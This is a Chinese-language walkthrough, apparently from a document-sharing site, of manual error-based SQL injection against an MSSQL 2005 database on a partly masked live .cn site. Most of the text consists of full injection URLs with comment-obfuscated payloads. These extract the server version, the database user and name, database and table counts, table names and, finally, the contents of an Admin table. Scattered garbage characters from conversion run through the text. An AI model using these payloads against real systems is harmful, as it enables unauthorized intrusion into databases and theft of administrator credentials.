《高级手工盲注mssql2005数据库.docx》由会员分享,可在线阅读,更多相关《高级手工盲注mssql2005数据库.docx(7页珍藏版)》请在得力文库 - 分享文档赚钱的网站上搜索。
1、我在入侵检测的时候,发现这样的一个注入点。1 J a5 O0 N5 Ahttp:/www*.cn/yth/english/read.php?FileID=31710 经过常规判断确定是注入点。) A0 E; . X! E8 c2 m# | qURL 后面加 报错 URL 后面 AND 1=1 正常 AND 1=2 异常 看 URL 后面加的截图是这样报错的 如图 1从报错中分析,这个数据库应该是 MSSQL 的数据。接下来就是用,ORDER BY 判断索引字符数啦,可是到这就出问题啦,ORDER BY 语句判断不了 报错在用 UNION SELECT 进行判断也 是报错,好像到这没法进行啦。用
2、啦几个比较有名的工具,也是无功而返。其实如果是这样的话,我们还可以试试盲注,毕竟它是有错误回显的。先判断下数据的版本,语句如下。http:/www*.cn/yth/english/read.php?FileID=31710/*/and/*/1=(char(33)%2Bchar(83)%2Bchar(33)%2B(/*/version/*/)%2Bchar(33)%2Bchar(69)%2Bchar(33) 如图 3看见啦吧 数据库是 MSSQL 2005 的 ,大家不知道 char(33)%2Bchar(83)%2Bchar(33)%2B 什么吧, 其实就是!S! %2Bchar(33)%2B
3、char(69)%2Bchar(33)是 !E! 这个意思就是要不报错的信息放在!S! * !E!之间,* 就表示爆出的信息。看看这点是不是和 MYSQL 数据库盲注时, 有点象 。在这点上是共通的。接下来,就是用户名 数据库 啦 用户名语句 如下http:/www*8cn/yth/english/read.php?FileID=31710/*/and/*/1=(char(33)%2Bchar(83)%2Bchar(33)%2B(/*/user/*/)%2Bchar(33)%2Bchar(69)%2Bchar(33) 如图 4用户名 openeduuser爆数据库,语句如下* C; e e5
4、H: ? b% F$ B http:/www*cn/yth/english/read.php?FileID=31710/*/and/*/1=(char(33)%2Bchar(83)%2 Bchar(33)%2B(/*/db_name/*/)%2Bchar(33)%2Bchar(69)%2Bchar(33) 如图 5数据库 openedu 接下来爆出所有数据库的个数 语句如下http:/www*.cn/yth/english/read.php?FileID=31710/*/and/*/1=(char(33)%2Bchar(83)%2Bchar(33)%2B(cast(select/*/count
5、(1)/*/from/*/master.sysdatabases)/*/as/*/varchar(8)%2Bchar(33)%2Bchar(69)%2Bchar(33) 如图 6一共有 16 个表,我就不一一爆啦。语句如下http:/www*.cn/yth/english/read.php?FileID=31710/*/and/*/1=(char(33)%2Bchar(83)%2Bchar(33)%2B(select/*/name/*/from/*/master.dbo.sysdatabases/*/where/*/dbid=16)%2Bchar(33)%2Bchar(69)%2Bchar(3
6、3) 想爆那个库,只要修改 dbid= 的数字即可。现在就来爆openedu 数据库的表的数目吧。语句如下2 K% y F J( L7 + Z5 # Hhttp:/ 7有 543 个 表 看看数据量很大吧 呵呵 接下来就是一个一个表的爆啦 ,语句如下。http:/ 只要依次修改/top/*/1/ 中 1 的位置为其他别的数字就可以爆出其他的表明啦 。经过一翻查找列到 501 个表时,发现 Admin列。语句如下: B8 h5 5 K$ e9 a$ f+ s8 http:/www*.cn/yth/english/read.php?FileID=31710/*/and/*/1=(char(33)%
7、2Bchar(83)%2Bchar(33)%2B(select/*/top/*/1/*/*/name/*/*/from(Select/*/top/*/501/*/id,name/*/from/*/openedu.sysobjects/*/where/*/xtype=0x55/*/*/and/*/name/*/not/*/like/*/0x570043005200540045004D0050002500/*/order/*/by/*/id)/*/T/*/order/*/by/*/id/*/desc)%2Bchar(33)%2Bchar(69)%2Bchar(33) 如图 8紧接着在来爆 Admin 列的内容,语句如下, G( . W, 5 A6 ( Vhttp:/ 如图 9有 4 个字段 接着爆出子这四个字段的内容 最终爆出 AdminName 语句如下6 R“ l. P* |6 W l+ u“ V8 S2 c! a4 L s( l只做技术交流吧 ,本人玩的时间不长,班门弄斧啦 ,大牛不要见笑啦。
限制150内